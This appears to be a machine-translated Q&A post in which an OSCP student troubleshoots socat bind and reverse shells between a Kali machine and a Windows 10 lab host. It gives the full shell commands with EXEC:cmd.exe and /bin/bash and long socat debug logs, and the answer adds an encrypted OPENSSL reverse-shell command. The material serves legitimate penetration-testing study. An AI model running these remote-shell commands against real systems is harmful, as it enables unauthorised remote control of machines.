web-dev-qa-db-ja.com

Socat-Windowsリバースシェルを作成する方法

こんにちは、私はここであなたの助けが必要です!

私は最近、OSCPマテリアルをアップグレードして新しいOSCPバージョン2020を取得し、暗号化されたバインドシェル/リバースシェルを作成するためにsocatの章に出会いました。

使い方は理解できたと思いましたが、WindowsマシンからKaliマシンに暗号化されたリバースシェルを送信しようとしても失敗しました。

両側で暗号化されていないバインドシェルでいくつかの試行錯誤を行うことにしました。

これが私のために働いたものです:

  • Kali Bind Shell(kaliバインドシェルソケットに接続してWindowsで/ bin/bashを取得)
  • Kali Reverse Shell(Windowsリスニングソケットに送信してWindowsで/ bin/bashを取得する)

これは私にとってうまくいかなかったものです:

  • Windowsバインドシェル(Windowsリスニングシェルソケットに接続してcmd.exeを取得)
  • Windowsリバースシェル(Kaliリスニングソケットに送信してcmd.exeを取得)

これが私がやったことです:

カーリーバインドシェル-OK

カリ(192.168.119.145)

socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash

Windows 10(192.168.145.10)

socat -d -d -d - TCP4:192.168.119.145:4444

カーリーリバースシェル-OK

Windows 10(192.168.145.10)

socat -d -d -d TCP4-LISTEN:4444,fork STDOUT

カリ(192.168.119.145)

socat -d -d -d TCP4:192.168.145.10:4444 EXEC:/bin/bash

Windows Bind Shell-NOT OK

Windows 10(192.168.145.10)

socat -d -d -d TCP4-LISTEN:4444,fork EXEC:cmd.exe

カリ(192.168.119.145)

socat -d -d -d - TCP4:192.168.145.10:4444

Windowsリバースシェル-NOT OK

カリ(192.168.119.145)

socat -d -d -d TCP4-LISTEN:4444,fork STDOUT

Windows 10(192.168.145.10)

socat -d -d -d TCP4:192.168.119.145:4444 EXEC:cmd.exe

これが私が得るものです:

Windowsバインドシェル-Windowsマシン

C:\Windows\system32>socat -d -d -d TCP4-LISTEN:443,fork EXEC:cmd.exe
2020/02/18 10:22:04 socat[3712] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 10:22:04 socat[3712] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 10:22:04 socat[3712] I This product includes software written by Tim Hudson ([email protected])
2020/02/18 10:22:04 socat[3712] I setting option "fork" to 1
2020/02/18 10:22:04 socat[3712] I socket(2, 1, 6) -> 5
2020/02/18 10:22:04 socat[3712] I starting accept loop
2020/02/18 10:22:04 socat[3712] N listening on AF=2 0.0.0.0:443
2020/02/18 10:22:25 socat[3712] I accept(5, {2, AF=2 192.168.119.145:36796}, 16) -> 6
2020/02/18 10:22:25 socat[3712] N accepting connection from AF=2 192.168.119.145:36796 on AF=2 192.168.145.10:443
2020/02/18 10:22:25 socat[3712] I permitting connection from AF=2 192.168.119.145:36796
2020/02/18 10:22:25 socat[3712] N forked off child process 4252
2020/02/18 10:22:25 socat[4252] I just born: child proces2020/02/18 10:22:25 socat[3712] I close(6)
2020/02/18 10:22:25 socat[4252] I just born: child process 4252
2020/02/18 10:22:25 socat[4252] I close(5)stening
2020/02/18 10:22:25 socat[4252] N forking off child, using socket for reading and writing
2020/02/18 10:22:25 socat[4252] I socketpair(1, 1, 0, {5,7}) -> 0
2020/02/18 10:22:25 socat[4252] N forked off child process 56402020/02/18 10:22:25 socat[5640] I just born: child proces
2020/02/18 10:22:25 socat[4252] N forked off child process 5640
2020/02/18 10:22:25 socat[5640] I close(5)
2020/02/18 10:22:25 socat[5640] I dup2(7, 0) -> 0
2020/02/18 10:22:25 socat[5640] I dup2(7, 1) -> 1ened all sock addresses
2020/02/18 10:22:25 socat[5640] I close(7) data transfer loop with FDs [6,6] and [5,5]
2020/02/18 10:22:25 socat[5640] N execvp'ing "cmd.exe"
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
2020/02/18 10:22:25 socat[4252] W read(5, 0x20044610, 8192): Connection reset by peer
2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 202020/02/18 10:22:25 socat[4252] I childdied(signum=20)
2020/02/18 10:22:25 socat[4252] I waitpid(): child 5640 exited with status 0
2020/02/18 10:22:25 socat[4252] I childdied() finishedANG): No child processes
2020/02/18 10:22:25 socat[4252] N socket 2 to socket 1 is in error
2020/02/18 10:22:25 socat[4252] N socket 2 (fd 5) is at EOF
2020/02/18 10:22:25 socat[4252] I shutdown(6, 1)
2020/02/18 10:22:25 socat[4252] I terminated child did not leave data for us
2020/02/18 10:22:25 socat[4252] I poll timed out (no data within 0.500000 seconds)
2020/02/18 10:22:25 socat[4252] I shutdown(6, 2)
2020/02/18 10:22:25 socat[4252] I shutdown(5, 2)
2020/02/18 10:22:25 socat[4252] N exiting with status 0
2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 20
2020/02/18 10:22:25 socat[3712] I childdied(signum=20)
2020/02/18 10:22:25 socat[3712] I childdied(20): cannot identify child 4252
2020/02/18 10:22:25 socat[3712] I waitpid(): child 4252 exited with status 0
2020/02/18 10:22:25 socat[3712] I waitpid(-1, {}, WNOHANG): No child processes
2020/02/18 10:22:25 socat[3712] I childdied() finished

Windows Bind Shell-Kali Machine

root@kali:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d - TCP4:192.168.145.10:443
2020/02/18 13:22:24 socat[9004] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 13:22:24 socat[9004] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/)
2020/02/18 13:22:24 socat[9004] I This product includes software written by Tim Hudson ([email protected])
2020/02/18 13:22:24 socat[9004] N reading from and writing to stdio
2020/02/18 13:22:24 socat[9004] N opening connection to AF=2 192.168.145.10:443
2020/02/18 13:22:24 socat[9004] I starting connect loop
2020/02/18 13:22:24 socat[9004] I socket(2, 1, 6) -> 5
2020/02/18 13:22:24 socat[9004] N successfully connected from local address AF=2 192.168.119.145:36796
2020/02/18 13:22:24 socat[9004] I resolved and opened all sock addresses
2020/02/18 13:22:24 socat[9004] N starting data transfer loop with FDs [0,1] and [5,5]
2020/02/18 13:22:25 socat[9004] N socket 2 (fd 5) is at EOF
2020/02/18 13:22:25 socat[9004] I poll timed out (no data within 0.500000 seconds)
2020/02/18 13:22:25 socat[9004] I shutdown(5, 2)
2020/02/18 13:22:25 socat[9004] N exiting with status 0

Windowsリバースシェル-Kali Machine

root@kali:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d TCP4-LISTEN:443 STDOUT
2020/02/18 13:07:13 socat[8925] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 13:07:13 socat[8925] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 13:07:13 socat[8925] I This product includes software written by Tim Hudson ([email protected])
2020/02/18 13:07:13 socat[8925] I socket(2, 1, 6) -> 5
2020/02/18 13:07:13 socat[8925] I starting accept loop
2020/02/18 13:07:13 socat[8925] N listening on AF=2 0.0.0.0:443
2020/02/18 13:07:18 socat[8925] I accept(5, {2, AF=2 192.168.145.10:61633}, 16) -> 6
2020/02/18 13:07:18 socat[8925] N accepting connection from AF=2 192.168.145.10:61633 on AF=2 192.168.119.145:443
2020/02/18 13:07:18 socat[8925] I permitting connection from AF=2 192.168.145.10:61633
2020/02/18 13:07:18 socat[8925] I close(5)
2020/02/18 13:07:18 socat[8925] N using stdout for reading and writing
2020/02/18 13:07:18 socat[8925] I resolved and opened all sock addresses
2020/02/18 13:07:18 socat[8925] N starting data transfer loop with FDs [6,6] and [1,1]
2020/02/18 13:07:18 socat[8925] N socket 1 (fd 6) is at EOF
2020/02/18 13:07:18 socat[8925] I poll timed out (no data within 0.500000 seconds)
2020/02/18 13:07:18 socat[8925] I shutdown(6, 2)
2020/02/18 13:07:18 socat[8925] N exiting with status 0

Windowsリバースシェル-Windowsマシン

C:\Windows\system32>socat -d -d -d TCP4:192.168.119.145:443 EXEC:cmd.exe
2020/02/18 10:06:39 socat[5396] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 10:06:39 socat[5396] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 10:06:39 socat[5396] I This product includes software written by Tim Hudson ([email protected])
2020/02/18 10:06:39 socat[5396] N opening connection to AF=2 192.168.119.145:443
2020/02/18 10:06:39 socat[5396] I starting connect loop
2020/02/18 10:06:39 socat[5396] I socket(2, 1, 6) -> 5
2020/02/18 10:06:39 socat[5396] N successfully connected from local address AF=2 192.168.145.10:61630
2020/02/18 10:06:39 socat[5396] N forking off child, using socket for reading and writing
2020/02/18 10:06:39 socat[5396] I socketpair(1, 1, 0, {6,7}) -> 0
2020/02/18 10:06:39 socat[5396] N forked off child process 2688
2020/02/18 10:06:39 socat[2688] I just born: child process 2688
2020/02/18 10:06:39 socat[5396] N forked off child process 2688
2020/02/18 10:06:39 socat[5396] I close(7)
2020/02/18 10:06:39 socat[5396] I resolved and opened all sock addresses
2020/02/18 10:06:39 socat[5396] N starting data transfer loop with FDs [5,5] and [6,6]
2020/02/18 10:06:39 socat[2688] I close(6)
2020/02/18 10:06:39 socat[2688] I dup2(7, 0) -> 0
2020/02/18 10:06:39 socat[2688] I dup2(7, 1) -> 1
2020/02/18 10:06:39 socat[2688] I close(7)
2020/02/18 10:06:39 socat[2688] N execvp'ing "cmd.exe"
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
2020/02/18 10:06:39 socat[5396] W read(6, 0x20044228, 8192): Connection reset by peer
2020/02/18 10:06:39 socat[5396] N childdied(): handling signal 20
2020/02/18 10:06:39 socat[5396] I childdied(signum=20)
2020/02/18 10:06:39 socat[5396] I exec'd process 2688 on socket 1 terminated
2020/02/18 10:06:39 socat[5396] I waitpid(): child 2688 exited with status 0
2020/02/18 10:06:39 socat[5396] I waitpid(-1, {}, WNOHANG): No child processes
2020/02/18 10:06:39 socat[5396] I childdied() finished
2020/02/18 10:06:39 socat[5396] N socket 2 to socket 1 is in error
2020/02/18 10:06:39 socat[5396] N socket 2 (fd 6) is at EOF
2020/02/18 10:06:39 socat[5396] I shutdown(5, 1)
2020/02/18 10:06:39 socat[5396] I terminated child did not leave data for us
2020/02/18 10:06:39 socat[5396] I poll timed out (no data within 0.500000 seconds)
2020/02/18 10:06:39 socat[5396] I shutdown(5, 2)
2020/02/18 10:06:39 socat[5396] I shutdown(6, 2)
2020/02/18 10:06:39 socat[5396] N exiting with status 0

ここで何が悪いのですか?

Windows cmd.exeプロセスをソケットにアタッチできないのはなぜですか?

PS:私の見本の間のタイムスタンプが一致しないことを知っています

4
R4Z3X

Windowsマシン(kaliから.pemファイルをコピー):

socat OPENSSL-LISTEN:443、cert = bind_Shell.pem、verify = 0 STDOUT

Kaliマシン:socat OPENSSL:192.168.X.X:443、verify = 0 EXEC:/ bin/bash

0
PirateZA